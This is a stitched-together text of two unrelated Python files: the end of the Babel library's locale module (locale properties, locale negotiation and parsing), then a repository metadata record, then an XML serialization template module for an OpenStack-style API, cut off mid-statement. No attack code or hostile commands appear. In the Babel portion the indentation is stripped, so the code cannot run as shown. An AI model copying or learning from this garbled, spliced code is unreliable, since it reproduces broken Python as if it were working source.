"""Mapping of currency codes to translated currency names. This
only returns the generic form of the currency name, not the count
specific one. If an actual number is requested use the
:func:`babel.numbers.get_currency_name` function.
>>> Locale('en').currencies['COP']
u'Colombian Peso'
>>> Locale('de', 'DE').currencies['COP']
u'Kolumbianischer Peso'
"""
return self._data['currency_names']
@property
def currency_symbols(self):
"""Mapping of currency codes to symbols.
>>> Locale('en', 'US').currency_symbols['USD']
u'$'
>>> Locale('es', 'CO').currency_symbols['USD']
u'US$'
"""
return self._data['currency_symbols']
@property
def number_symbols(self):
"""Symbols used in number formatting.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('fr', 'FR').number_symbols['decimal']
u','
"""
return self._data['number_symbols']
@property
def decimal_formats(self):
"""Locale patterns for decimal number formatting.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').decimal_formats[None]
<NumberPattern u'#,##0.###'>
"""
return self._data['decimal_formats']
@property
def currency_formats(self):
"""Locale patterns for currency number formatting.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').currency_formats['standard']
<NumberPattern u'\\xa4#,##0.00'>
>>> Locale('en', 'US').currency_formats['accounting']
<NumberPattern u'\\xa4#,##0.00;(\\xa4#,##0.00)'>
"""
return self._data['currency_formats']
@property
def percent_formats(self):
"""Locale patterns for percent number formatting.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').percent_formats[None]
<NumberPattern u'#,##0%'>
"""
return self._data['percent_formats']
@property
def scientific_formats(self):
"""Locale patterns for scientific number formatting.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').scientific_formats[None]
<NumberPattern u'#E0'>
"""
return self._data['scientific_formats']
# { Calendar Information and Date Formatting
@property
def periods(self):
"""Locale display names for day periods (AM/PM).
>>> Locale('en', 'US').periods['am']
u'AM'
"""
try:
return self._data['day_periods']['stand-alone']['wide']
except KeyError:
return {}
@property
def day_periods(self):
"""Locale display names for various day periods (not necessarily only AM/PM).
These are not meant to be used without the relevant `day_period_rules`.
"""
return self._data['day_periods']
@property
def day_period_rules(self):
"""Day period rules for the locale. Used by `get_period_id`.
"""
return self._data.get('day_period_rules', {})
@property
def days(self):
"""Locale display names for weekdays.
>>> Locale('de', 'DE').days['format']['wide'][3]
u'Donnerstag'
"""
return self._data['days']
@property
def months(self):
"""Locale display names for months.
>>> Locale('de', 'DE').months['format']['wide'][10]
u'Oktober'
"""
return self._data['months']
@property
def quarters(self):
"""Locale display names for quarters.
>>> Locale('de', 'DE').quarters['format']['wide'][1]
u'1. Quartal'
"""
return self._data['quarters']
@property
def eras(self):
"""Locale display names for eras.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').eras['wide'][1]
u'Anno Domini'
>>> Locale('en', 'US').eras['abbreviated'][0]
u'BC'
"""
return self._data['eras']
@property
def time_zones(self):
"""Locale display names for time zones.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').time_zones['Europe/London']['long']['daylight']
u'British Summer Time'
>>> Locale('en', 'US').time_zones['America/St_Johns']['city']
u'St. John\u2019s'
"""
return self._data['time_zones']
@property
def meta_zones(self):
"""Locale display names for meta time zones.
Meta time zones are basically groups of different Olson time zones that
have the same GMT offset and daylight savings time.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').meta_zones['Europe_Central']['long']['daylight']
u'Central European Summer Time'
.. versionadded:: 0.9
"""
return self._data['meta_zones']
@property
def zone_formats(self):
"""Patterns related to the formatting of time zones.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').zone_formats['fallback']
u'%(1)s (%(0)s)'
>>> Locale('pt', 'BR').zone_formats['region']
u'Hor\\xe1rio %s'
.. versionadded:: 0.9
"""
return self._data['zone_formats']
@property
def first_week_day(self):
"""The first day of a week, with 0 being Monday.
>>> Locale('de', 'DE').first_week_day
0
>>> Locale('en', 'US').first_week_day
6
"""
return self._data['week_data']['first_day']
@property
def weekend_start(self):
"""The day the weekend starts, with 0 being Monday.
>>> Locale('de', 'DE').weekend_start
5
"""
return self._data['week_data']['weekend_start']
@property
def weekend_end(self):
"""The day the weekend ends, with 0 being Monday.
>>> Locale('de', 'DE').weekend_end
6
"""
return self._data['week_data']['weekend_end']
@property
def min_week_days(self):
"""The minimum number of days in a week so that the week is counted as
the first week of a year or month.
>>> Locale('de', 'DE').min_week_days
4
"""
return self._data['week_data']['min_days']
@property
def date_formats(self):
"""Locale patterns for date formatting.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').date_formats['short']
<DateTimePattern u'M/d/yy'>
>>> Locale('fr', 'FR').date_formats['long']
<DateTimePattern u'd MMMM y'>
"""
return self._data['date_formats']
@property
def time_formats(self):
"""Locale patterns for time formatting.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en', 'US').time_formats['short']
<DateTimePattern u'h:mm a'>
>>> Locale('fr', 'FR').time_formats['long']
<DateTimePattern u'HH:mm:ss z'>
"""
return self._data['time_formats']
@property
def datetime_formats(self):
"""Locale patterns for datetime formatting.
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en').datetime_formats['full']
u"{1} 'at' {0}"
>>> Locale('th').datetime_formats['medium']
u'{1} {0}'
"""
return self._data['datetime_formats']
@property
def datetime_skeletons(self):
"""Locale patterns for formatting parts of a datetime.
>>> Locale('en').datetime_skeletons['MEd']
<DateTimePattern u'E, M/d'>
>>> Locale('fr').datetime_skeletons['MEd']
<DateTimePattern u'E dd/MM'>
>>> Locale('fr').datetime_skeletons['H']
<DateTimePattern u"HH 'h'">
"""
return self._data['datetime_skeletons']
@property
def interval_formats(self):
"""Locale patterns for interval formatting.
.. note:: The format of the value returned may change between
Babel versions.
How to format date intervals in Finnish when the day is the
smallest changing component:
>>> Locale('fi_FI').interval_formats['MEd']['d']
[u'E d. \u2013 ', u'E d.M.']
.. seealso::
The primary API to use this data is :py:func:`babel.dates.format_interval`.
:rtype: dict[str, dict[str, list[str]]]
"""
return self._data['interval_formats']
@property
def plural_form(self):
"""Plural rules for the locale.
>>> Locale('en').plural_form(1)
'one'
>>> Locale('en').plural_form(0)
'other'
>>> Locale('fr').plural_form(0)
'one'
>>> Locale('ru').plural_form(100)
'many'
"""
return self._data.get('plural_form', _default_plural_rule)
@property
def list_patterns(self):
"""Patterns for generating lists
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en').list_patterns['start']
u'{0}, {1}'
>>> Locale('en').list_patterns['end']
u'{0}, and {1}'
>>> Locale('en_GB').list_patterns['end']
u'{0} and {1}'
"""
return self._data['list_patterns']
@property
def ordinal_form(self):
"""Plural rules for the locale.
>>> Locale('en').ordinal_form(1)
'one'
>>> Locale('en').ordinal_form(2)
'two'
>>> Locale('en').ordinal_form(3)
'few'
>>> Locale('fr').ordinal_form(2)
'other'
>>> Locale('ru').ordinal_form(100)
'other'
"""
return self._data.get('ordinal_form', _default_plural_rule)
@property
def measurement_systems(self):
"""Localized names for various measurement systems.
>>> Locale('fr', 'FR').measurement_systems['US']
u'am\\xe9ricain'
>>> Locale('en', 'US').measurement_systems['US']
u'US'
"""
return self._data['measurement_systems']
@property
def character_order(self):
"""The text direction for the language.
>>> Locale('de', 'DE').character_order
'left-to-right'
>>> Locale('ar', 'SA').character_order
'right-to-left'
"""
return self._data['character_order']
@property
def text_direction(self):
"""The text direction for the language in CSS short-hand form.
>>> Locale('de', 'DE').text_direction
'ltr'
>>> Locale('ar', 'SA').text_direction
'rtl'
"""
return ''.join(word[0] for word in self.character_order.split('-'))
@property
def unit_display_names(self):
"""Display names for units of measurement.
.. seealso::
You may want to use :py:func:`babel.units.get_unit_name` instead.
.. note:: The format of the value returned may change between
Babel versions.
"""
return self._data['unit_display_names']
def default_locale(category=None, aliases=LOCALE_ALIASES):
"""Returns the system default locale for a given category, based on
environment variables.
>>> for name in ['LANGUAGE', 'LC_ALL', 'LC_CTYPE']:
... os.environ[name] = ''
>>> os.environ['LANG'] = 'fr_FR.UTF-8'
>>> default_locale('LC_MESSAGES')
'fr_FR'
The "C" or "POSIX" pseudo-locales are treated as aliases for the
"en_US_POSIX" locale:
>>> os.environ['LC_MESSAGES'] = 'POSIX'
>>> default_locale('LC_MESSAGES')
'en_US_POSIX'
    The following environment variables are always considered as fallbacks:
- ``LANGUAGE``
- ``LC_ALL``
- ``LC_CTYPE``
- ``LANG``
:param category: one of the ``LC_XXX`` environment variable names
:param aliases: a dictionary of aliases for locale identifiers
"""
varnames = (category, 'LANGUAGE', 'LC_ALL', 'LC_CTYPE', 'LANG')
for name in filter(None, varnames):
locale = os.getenv(name)
if locale:
if name == 'LANGUAGE' and ':' in locale:
# the LANGUAGE variable may contain a colon-separated list of
# language codes; we just pick the language on the list
locale = locale.split(':')[0]
if locale.split('.')[0] in ('C', 'POSIX'):
locale = 'en_US_POSIX'
elif aliases and locale in aliases:
locale = aliases[locale]
try:
return get_locale_identifier(parse_locale(locale))
except ValueError:
pass
def negotiate_locale(preferred, available, sep='_', aliases=LOCALE_ALIASES):
"""Find the best match between available and requested locale strings.
>>> negotiate_locale(['de_DE', 'en_US'], ['de_DE', 'de_AT'])
'de_DE'
>>> negotiate_locale(['de_DE', 'en_US'], ['en', 'de'])
'de'
    Case is ignored by the algorithm; the result uses the case of the preferred
locale identifier:
>>> negotiate_locale(['de_DE', 'en_US'], ['de_de', 'de_at'])
'de_DE'
>>> negotiate_locale(['de_DE', 'en_US'], ['de_de', 'de_at'])
'de_DE'
By default, some web browsers unfortunately do not include the territory
in the locale identifier for many locales, and some don't even allow the
user to easily add the territory. So while you may prefer using qualified
    locale identifiers in your web application, they would not normally match
    the language-only locale sent by such browsers. To work around that, this
    function uses a default mapping of commonly used language-only locale
identifiers to identifiers including the territory:
>>> negotiate_locale(['ja', 'en_US'], ['ja_JP', 'en_US'])
'ja_JP'
Some browsers even use an incorrect or outdated language code, such as "no"
for Norwegian, where the correct locale identifier would actually be "nb_NO"
(Bokmål) or "nn_NO" (Nynorsk). The aliases are intended to take care of
such cases, too:
>>> negotiate_locale(['no', 'sv'], ['nb_NO', 'sv_SE'])
'nb_NO'
You can override this default mapping by passing a different `aliases`
    dictionary to this function, or you can bypass the behavior altogether by
setting the `aliases` parameter to `None`.
:param preferred: the list of locale strings preferred by the user
:param available: the list of locale strings available
:param sep: character that separates the different parts of the locale
strings
:param aliases: a dictionary of aliases for locale identifiers
"""
available = [a.lower() for a in available if a]
for locale in preferred:
ll = locale.lower()
if ll in available:
return locale
if aliases:
alias = aliases.get(ll)
if alias:
alias = alias.replace('_', sep)
if alias.lower() in available:
return alias
parts = locale.split(sep)
if len(parts) > 1 and parts[0].lower() in available:
return parts[0]
return None
def parse_locale(identifier, sep='_'):
"""Parse a locale identifier into a tuple of the form ``(language,
territory, script, variant)``.
>>> parse_locale('zh_CN')
('zh', 'CN', None, None)
>>> parse_locale('zh_Hans_CN')
('zh', 'CN', 'Hans', None)
The default component separator is "_", but a different separator can be
specified using the `sep` parameter:
>>> parse_locale('zh-CN', sep='-')
('zh', 'CN', None, None)
If the identifier cannot be parsed into a locale, a `ValueError` exception
is raised:
>>> parse_locale('not_a_LOCALE_String')
Traceback (most recent call last):
...
ValueError: 'not_a_LOCALE_String' is not a valid locale identifier
Encoding information and locale modifiers are removed from the identifier:
>>> parse_locale('it_IT@euro')
('it', 'IT', None, None)
>>> parse_locale('en_US.UTF-8')
('en', 'US', None, None)
>>> parse_locale('de_DE.iso885915@euro')
('de', 'DE', None, None)
See :rfc:`4646` for more information.
:param identifier: the locale identifier string
:param sep: character that separates the different components of the locale
identifier
:raise `ValueError`: if the string does not appear to be a valid locale
identifier
"""
if '.' in identifier:
# this is probably the charset/encoding, which we don't care about
identifier = identifier.split('.', 1)[0]
if '@' in identifier:
# this is a locale modifier such as @euro, which we don't care about
# either
identifier = identifier.split('@', 1)[0]
parts = identifier.split(sep)
lang = parts.pop(0).lower()
if not lang.isalpha():
raise ValueError('expected only letters, got %r' % lang)
script = territory = variant = None
if parts:
if len(parts[0]) == 4 and parts[0].isalpha():
script = parts.pop(0).title()
if parts:
if len(parts[0]) == 2 and parts[0].isalpha():
territory = parts.pop(0).upper()
elif len(parts[0]) == 3 and parts[0].isdigit():
territory = parts.pop(0)
if parts:
if len(parts[0]) == 4 and parts[0][0].isdigit() or \
len(parts[0]) >= 5 and parts[0][0].isalpha():
variant = parts.pop()
if parts:
raise ValueError('%r is not a valid locale identifier' % identifier)
return lang, territory, script, variant
def get_locale_identifier(tup, sep='_'):
"""The reverse of :func:`parse_locale`. It creates a locale identifier out
of a ``(language, territory, script, variant)`` tuple. Items can be set to
``None`` and trailing ``None``\s can also be left out of the tuple.
>>> get_locale_identifier(('de', 'DE', None, '1999'))
'de_DE_1999'
.. versionadded:: 1.0
:param tup: the tuple as returned by :func:`parse_locale`.
:param sep: the separator for the identifier.
"""
tup = tuple(tup[:4])
lang, territory, script, variant = tup + (None,) * (4 - len(tup))
return sep.join(filter(None, (lang, script, territory, variant)))
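# Illustrative round trip (doctest-style, mirroring the examples above):
#
#     >>> get_locale_identifier(parse_locale('de-DE-1901', sep='-'), sep='-')
#     'de-DE-1901'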
| {
"content_hash": "20a676f4d97d8f92953ec505904bbb3c",
"timestamp": "",
"source": "github",
"line_count": 1131,
"max_line_length": 86,
"avg_line_length": 32.5393457117595,
"alnum_prop": 0.569751643932395,
"repo_name": "vicky2135/lucious",
"id": "bb59b7413f8365c889528d1074c85af06b88820f",
"size": "36827",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "oscar/lib/python2.7/site-packages/babel/core.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "896683"
},
{
"name": "C++",
"bytes": "52230"
},
{
"name": "CSS",
"bytes": "1169533"
},
{
"name": "HTML",
"bytes": "1104983"
},
{
"name": "JavaScript",
"bytes": "1055140"
},
{
"name": "Makefile",
"bytes": "145238"
},
{
"name": "Python",
"bytes": "55993261"
},
{
"name": "Shell",
"bytes": "40487"
}
],
"symlink_target": ""
} |
import os.path
import re
from lxml import etree
import six
from conveyor.i18n import _
from conveyor import utils
XMLNS_V10 = 'http://docs.rackspacecloud.com/servers/api/v1.0'
XMLNS_V11 = 'http://docs.openstack.org/compute/api/v1.1'
XMLNS_COMMON_V10 = 'http://docs.openstack.org/common/api/v1.0'
XMLNS_ATOM = 'http://www.w3.org/2005/Atom'
XMLNS_VOLUME_V1 = ('http://docs.openstack.org/api/openstack-block-storage/1.0/'
'content')
XMLNS_VOLUME_V2 = ('http://docs.openstack.org/api/openstack-block-storage/2.0/'
'content')
_split_pattern = re.compile(r'([^:{]*{[^}]*}[^:]*|[^:]+)')
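# _split_pattern splits a colon-separated tag path such as 'ns:parent:child'
# into its components while keeping any '{namespace-uri}tag' chunk intact;
# this is the (assumed) intent behind _splitTagName further below.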
def validate_schema(xml, schema_name):
if isinstance(xml, str):
xml = etree.fromstring(xml)
base_path = 'conveyor/api/schemas/v1.1/'
if schema_name in ('atom', 'atom-link'):
base_path = 'conveyor/api/schemas/'
schema_path = os.path.join(utils.cinderdir(),
'%s%s.rng' % (base_path, schema_name))
schema_doc = etree.parse(schema_path)
relaxng = etree.RelaxNG(schema_doc)
relaxng.assertValid(xml)
class Selector(object):
"""Selects datum to operate on from an object."""
def __init__(self, *chain):
"""Initialize the selector.
Each argument is a subsequent index into the object.
"""
self.chain = chain
def __repr__(self):
"""Return a representation of the selector."""
return "Selector" + repr(self.chain)
def __call__(self, obj, do_raise=False):
"""Select a datum to operate on.
Selects the relevant datum within the object.
        :param obj: The object from which to select the datum.
:param do_raise: If False (the default), return None if the
indexed datum does not exist. Otherwise,
raise a KeyError.
"""
# Walk the selector list
for elem in self.chain:
# If it's callable, call it
if callable(elem):
obj = elem(obj)
else:
# Use indexing
try:
obj = obj[elem]
except (KeyError, IndexError):
# No sense going any further
if do_raise:
# Convert to a KeyError, for consistency
raise KeyError(elem)
return None
# Return the finally-selected object
return obj
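# Illustrative example (not from the original module): a Selector walks nested
# mappings/sequences one key at a time, so
#
#     Selector('server', 'addresses', 0)({'server': {'addresses': ['10.0.0.1']}})
#
# returns '10.0.0.1', while a missing key yields None (or a KeyError when
# called with do_raise=True).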
def get_items(obj):
"""Get items in obj."""
return list(obj.items())
class EmptyStringSelector(Selector):
"""Returns the empty string if Selector would return None."""
def __call__(self, obj, do_raise=False):
"""Returns empty string if the selected value does not exist."""
try:
return super(EmptyStringSelector, self).__call__(obj, True)
except KeyError:
return ""
class ConstantSelector(object):
"""Returns a constant."""
def __init__(self, value):
"""Initialize the selector.
:param value: The value to return.
"""
self.value = value
def __repr__(self):
"""Return a representation of the selector."""
return repr(self.value)
def __call__(self, _obj, _do_raise=False):
"""Select a datum to operate on.
Returns a constant value. Compatible with
Selector.__call__().
"""
return self.value
class TemplateElement(object):
"""Represent an element in the template."""
def __init__(self, tag, attrib=None, selector=None, subselector=None,
**extra):
"""Initialize an element.
Initializes an element in the template. Keyword arguments
specify attributes to be set on the element; values must be
callables. See TemplateElement.set() for more information.
:param tag: The name of the tag to create.
:param attrib: An optional dictionary of element attributes.
:param selector: An optional callable taking an object and
optional boolean do_raise indicator and
returning the object bound to the element.
:param subselector: An optional callable taking an object and
optional boolean do_raise indicator and
returning the object bound to the element.
This is used to further refine the datum
object returned by selector in the event
that it is a list of objects.
"""
# Convert selector into a Selector
if selector is None:
selector = Selector()
elif not callable(selector):
selector = Selector(selector)
# Convert subselector into a Selector
if subselector is not None and not callable(subselector):
subselector = Selector(subselector)
self.tag = tag
self.selector = selector
self.subselector = subselector
self.attrib = {}
self._text = None
self._children = []
self._childmap = {}
# Run the incoming attributes through set() so that they
# become selectorized
if not attrib:
attrib = {}
attrib.update(extra)
for k, v in attrib.items():
self.set(k, v)
def __repr__(self):
"""Return a representation of the template element."""
return ('<%s.%s %r at %#x>' %
(self.__class__.__module__, self.__class__.__name__,
self.tag, id(self)))
def __len__(self):
"""Return the number of child elements."""
return len(self._children)
def __contains__(self, key):
"""Determine whether a child node named by key exists."""
return key in self._childmap
def __getitem__(self, idx):
"""Retrieve a child node by index or name."""
        if isinstance(idx, six.string_types):
# Allow access by node name
return self._childmap[idx]
else:
return self._children[idx]
def append(self, elem):
"""Append a child to the element."""
# Unwrap templates...
elem = elem.unwrap()
# Avoid duplications
if elem.tag in self._childmap:
raise KeyError(elem.tag)
self._children.append(elem)
self._childmap[elem.tag] = elem
def extend(self, elems):
"""Append children to the element."""
# Pre-evaluate the elements
elemmap = {}
elemlist = []
for elem in elems:
# Unwrap templates...
elem = elem.unwrap()
# Avoid duplications
if elem.tag in self._childmap or elem.tag in elemmap:
raise KeyError(elem.tag)
elemmap[elem.tag] = elem
elemlist.append(elem)
# Update the children
self._children.extend(elemlist)
self._childmap.update(elemmap)
def insert(self, idx, elem):
"""Insert a child element at the given index."""
# Unwrap templates...
elem = elem.unwrap()
# Avoid duplications
if elem.tag in self._childmap:
raise KeyError(elem.tag)
self._children.insert(idx, elem)
self._childmap[elem.tag] = elem
def remove(self, elem):
"""Remove a child element."""
# Unwrap templates...
elem = elem.unwrap()
# Check if element exists
if elem.tag not in self._childmap or self._childmap[elem.tag] != elem:
raise ValueError(_('element is not a child'))
self._children.remove(elem)
del self._childmap[elem.tag]
def get(self, key):
"""Get an attribute.
Returns a callable which performs datum selection.
:param key: The name of the attribute to get.
"""
return self.attrib[key]
def set(self, key, value=None):
"""Set an attribute.
:param key: The name of the attribute to set.
:param value: A callable taking an object and optional boolean
do_raise indicator and returning the datum bound
to the attribute. If None, a Selector() will be
constructed from the key. If a string, a
Selector() will be constructed from the string.
"""
# Convert value to a selector
if value is None:
value = Selector(key)
elif not callable(value):
value = Selector(value)
self.attrib[key] = value
def keys(self):
"""Return the attribute names."""
return self.attrib.keys()
def items(self):
"""Return the attribute names and values."""
return self.attrib.items()
def unwrap(self):
"""Unwraps a template to return a template element."""
# We are a template element
return self
def wrap(self):
"""Wraps a template element to return a template."""
# Wrap in a basic Template
return Template(self)
def apply(self, elem, obj):
"""Apply text and attributes to an etree.Element.
Applies the text and attribute instructions in the template
element to an etree.Element instance.
:param elem: An etree.Element instance.
:param obj: The base object associated with this template
element.
"""
# Start with the text...
if self.text is not None:
elem.text = six.text_type(self.text(obj))
# Now set up all the attributes...
for key, value in self.attrib.items():
try:
elem.set(key, six.text_type(value(obj, True)))
except KeyError:
# Attribute has no value, so don't include it
pass
def getAttrib(self, obj):
"""Get attribute."""
tmpattrib = {}
# Now set up all the attributes...
for key, value in self.attrib.items():
try:
tmpattrib[key] = value(obj)
except KeyError:
# Attribute has no value, so don't include it
pass
return tmpattrib
@staticmethod
def _splitTagName(name):
return _split_pattern.findall(name)
def _render(self, parent, datum, patches, nsmap):
"""Internal rendering.
Renders the template node into an etree.Element object.
Returns the etree.Element object.
:param parent: The parent etree.Element instance.
:param datum: The datum associated with this template element.
:param patches: A list of other template elements that must
also be applied.
:param nsmap: An optional namespace dictionary to be
associated with the etree.Element instance.
"""
# Allocate a node
if callable(self.tag):
tagname = self.tag(datum)
else:
tagname = self.tag
# If the datum is None
if datum is not None:
tmpattrib = self.getAttrib(datum)
else:
tmpattrib = {}
tagnameList = self._splitTagName(tagname)
insertIndex = 0
        # If parent is not None and has the same tag name
if parent is not None:
for i in range(0, len(tagnameList)):
tmpInsertPos = parent.find(tagnameList[i])
if tmpInsertPos is None:
break
                elif parent.attrib != tmpattrib:
break
parent = tmpInsertPos
insertIndex = i + 1
if insertIndex >= len(tagnameList):
insertIndex = insertIndex - 1
# Create root elem
elem = etree.Element(tagnameList[insertIndex], nsmap=nsmap)
rootelem = elem
subelem = elem
# Create subelem
for i in range((insertIndex + 1), len(tagnameList)):
subelem = etree.SubElement(elem, tagnameList[i])
elem = subelem
# If we have a parent, append the node to the parent
if parent is not None:
# If we can merge this element, then insert
if insertIndex > 0:
parent.insert(len(list(parent)), rootelem)
else:
parent.append(rootelem)
# If the datum is None, do nothing else
if datum is None:
return rootelem
# Apply this template element to the element
self.apply(subelem, datum)
# Additionally, apply the patches
for patch in patches:
patch.apply(subelem, datum)
# We have fully rendered the element; return it
return rootelem
def render(self, parent, obj, patches=None, nsmap=None):
"""Render an object.
Renders an object against this template node. Returns a list
of two-item tuples, where the first item is an etree.Element
instance and the second item is the datum associated with that
instance.
:param parent: The parent for the etree.Element instances.
:param obj: The object to render this template element
against.
:param patches: A list of other template elements to apply
when rendering this template element.
:param nsmap: An optional namespace dictionary to attach to
the etree.Element instances.
"""
patches = patches or []
# First, get the datum we're rendering
data = None if obj is None else self.selector(obj)
# Check if we should render at all
if not self.will_render(data):
return []
elif data is None:
return [(self._render(parent, None, patches, nsmap), None)]
# Make the data into a list if it isn't already
if not isinstance(data, list):
data = [data]
elif parent is None:
raise ValueError(_('root element selecting a list'))
# Render all the elements
elems = []
for datum in data:
if self.subselector is not None:
datum = self.subselector(datum)
elems.append((self._render(parent, datum, patches, nsmap), datum))
# Return all the elements rendered, as well as the
# corresponding datum for the next step down the tree
return elems
def will_render(self, datum):
"""Hook method.
An overridable hook method to determine whether this template
element will be rendered at all. By default, returns False
(inhibiting rendering) if the datum is None.
:param datum: The datum associated with this template element.
"""
# Don't render if datum is None
return datum is not None
def _text_get(self):
"""Template element text.
Either None or a callable taking an object and optional
boolean do_raise indicator and returning the datum bound to
the text of the template element.
"""
return self._text
def _text_set(self, value):
# Convert value to a selector
if value is not None and not callable(value):
value = Selector(value)
self._text = value
def _text_del(self):
self._text = None
text = property(_text_get, _text_set, _text_del)
def tree(self):
"""Return string representation of the template tree.
Returns a representation of the template rooted at this
element as a string, suitable for inclusion in debug logs.
"""
# Build the inner contents of the tag...
contents = [self.tag, '!selector=%r' % self.selector]
# Add the text...
if self.text is not None:
contents.append('!text=%r' % self.text)
# Add all the other attributes
for key, value in self.attrib.items():
contents.append('%s=%r' % (key, value))
# If there are no children, return it as a closed tag
if len(self) == 0:
return '<%s/>' % ' '.join([str(i) for i in contents])
# OK, recurse to our children
children = [c.tree() for c in self]
# Return the result
return ('<%s>%s</%s>' %
(' '.join(contents), ''.join(children), self.tag))
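# Editor's note: the helper below is an illustrative sketch, not part of the
# original module.  It assumes the Selector class used throughout this file
# resolves plain dictionary keys, that _splitTagName() passes a simple tag
# through unchanged, and that etree is lxml.etree as imported at the top of
# the module; the values in the trailing comment are expected under those
# assumptions only.
def _example_template_element_usage():
    # Attributes are bound to selectors: set('id') reads obj['id'], while a
    # callable computes the value itself (do_raise mirrors Selector's signature).
    elem = TemplateElement('server', selector='server')
    elem.set('id')
    elem.set('status', lambda obj, do_raise=False: obj.get('state', 'UNKNOWN'))
    obj = {'server': {'id': 'abc123', 'state': 'ACTIVE'}}
    # render() returns (etree element, datum) pairs for the next level down.
    rendered, datum = elem.render(None, obj)[0]
    return rendered.get('id'), rendered.get('status'), datum
    # -> ('abc123', 'ACTIVE', {'id': 'abc123', 'state': 'ACTIVE'})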
def SubTemplateElement(parent, tag, attrib=None, selector=None,
subselector=None, **extra):
"""Create a template element as a child of another.
Corresponds to the etree.SubElement interface. Parameters are as
for TemplateElement, with the addition of the parent.
"""
# Convert attributes
attrib = attrib or {}
attrib.update(extra)
# Get a TemplateElement
elem = TemplateElement(tag, attrib=attrib, selector=selector,
subselector=subselector)
    # Append to the parent safely
if parent is not None:
parent.append(elem)
return elem
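# Editor's note: a minimal sketch of building a parent/child pair with
# SubTemplateElement(); it is not part of the original module.
def _example_subtemplate_element():
    root = TemplateElement('server', selector='server')
    root.set('id')
    # The child is created and appended in one call, mirroring etree.SubElement;
    # its text will be pulled from obj['server']['name'] when rendered.
    name = SubTemplateElement(root, 'name')
    name.text = 'name'
    return root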
class Template(object):
"""Represent a template."""
def __init__(self, root, nsmap=None):
"""Initialize a template.
:param root: The root element of the template.
:param nsmap: An optional namespace dictionary to be
associated with the root element of the
template.
"""
self.root = root.unwrap() if root is not None else None
self.nsmap = nsmap or {}
self.serialize_options = dict(encoding='UTF-8', xml_declaration=True)
def _serialize(self, parent, obj, siblings, nsmap=None):
"""Internal serialization.
Recursive routine to build a tree of etree.Element instances
from an object based on the template. Returns the first
etree.Element instance rendered, or None.
:param parent: The parent etree.Element instance. Can be
None.
:param obj: The object to render.
:param siblings: The TemplateElement instances against which
to render the object.
:param nsmap: An optional namespace dictionary to be
associated with the etree.Element instance
rendered.
"""
# First step, render the element
elems = siblings[0].render(parent, obj, siblings[1:], nsmap)
# Now, traverse all child elements
seen = set()
for idx, sibling in enumerate(siblings):
for child in sibling:
# Have we handled this child already?
if child.tag in seen:
continue
seen.add(child.tag)
# Determine the child's siblings
nieces = [child]
for sib in siblings[idx + 1:]:
if child.tag in sib:
nieces.append(sib[child.tag])
# Now call this function for all data elements recursively
for elem, datum in elems:
self._serialize(elem, datum, nieces)
# Return the first element; at the top level, this will be the
# root element
if elems:
return elems[0][0]
def serialize(self, obj, *args, **kwargs):
"""Serialize an object.
Serializes an object against the template. Returns a string
with the serialized XML. Positional and keyword arguments are
passed to etree.tostring().
:param obj: The object to serialize.
"""
elem = self.make_tree(obj)
if elem is None:
return ''
for k, v in self.serialize_options.items():
kwargs.setdefault(k, v)
# Serialize it into XML
return etree.tostring(elem, *args, **kwargs)
def make_tree(self, obj):
"""Create a tree.
Serializes an object against the template. Returns an Element
node with appropriate children.
:param obj: The object to serialize.
"""
        # If the template is empty, there is nothing to render
if self.root is None:
return None
# Get the siblings and nsmap of the root element
siblings = self._siblings()
nsmap = self._nsmap()
# Form the element tree
return self._serialize(None, obj, siblings, nsmap)
def _siblings(self):
"""Hook method for computing root siblings.
An overridable hook method to return the siblings of the root
element. By default, this is the root element itself.
"""
return [self.root]
def _nsmap(self):
"""Hook method for computing the namespace dictionary.
An overridable hook method to return the namespace dictionary.
"""
return self.nsmap.copy()
def unwrap(self):
"""Unwraps a template to return a template element."""
# Return the root element
return self.root
def wrap(self):
"""Wraps a template element to return a template."""
# We are a template
return self
def apply(self, master):
"""Hook method for determining slave applicability.
An overridable hook method used to determine if this template
is applicable as a slave to a given master template.
:param master: The master template to test.
"""
return True
def tree(self):
"""Return string representation of the template tree.
Returns a representation of the template as a string, suitable
for inclusion in debug logs.
"""
return "%r: %s" % (self, self.root.tree())
class MasterTemplate(Template):
"""Represent a master template.
Master templates are versioned derivatives of templates that
additionally allow slave templates to be attached. Slave
templates allow modification of the serialized result without
directly changing the master.
"""
def __init__(self, root, version, nsmap=None):
"""Initialize a master template.
:param root: The root element of the template.
:param version: The version number of the template.
:param nsmap: An optional namespace dictionary to be
associated with the root element of the
template.
"""
super(MasterTemplate, self).__init__(root, nsmap)
self.version = version
self.slaves = []
def __repr__(self):
"""Return string representation of the template."""
return ("<%s.%s object version %s at %#x>" %
(self.__class__.__module__, self.__class__.__name__,
self.version, id(self)))
def _siblings(self):
"""Hook method for computing root siblings.
An overridable hook method to return the siblings of the root
element. This is the root element plus the root elements of
all the slave templates.
"""
return [self.root] + [slave.root for slave in self.slaves]
def _nsmap(self):
"""Hook method for computing the namespace dictionary.
An overridable hook method to return the namespace dictionary.
The namespace dictionary is computed by taking the master
template's namespace dictionary and updating it from all the
slave templates.
"""
nsmap = self.nsmap.copy()
for slave in self.slaves:
nsmap.update(slave._nsmap())
return nsmap
def attach(self, *slaves):
"""Attach one or more slave templates.
Attaches one or more slave templates to the master template.
Slave templates must have a root element with the same tag as
the master template. The slave template's apply() method will
be called to determine if the slave should be applied to this
master; if it returns False, that slave will be skipped.
(This allows filtering of slaves based on the version of the
master template.)
"""
slave_list = []
for slave in slaves:
slave = slave.wrap()
# Make sure we have a tree match
if slave.root.tag != self.root.tag:
msg = (_("Template tree mismatch; adding slave %(slavetag)s "
"to master %(mastertag)s") %
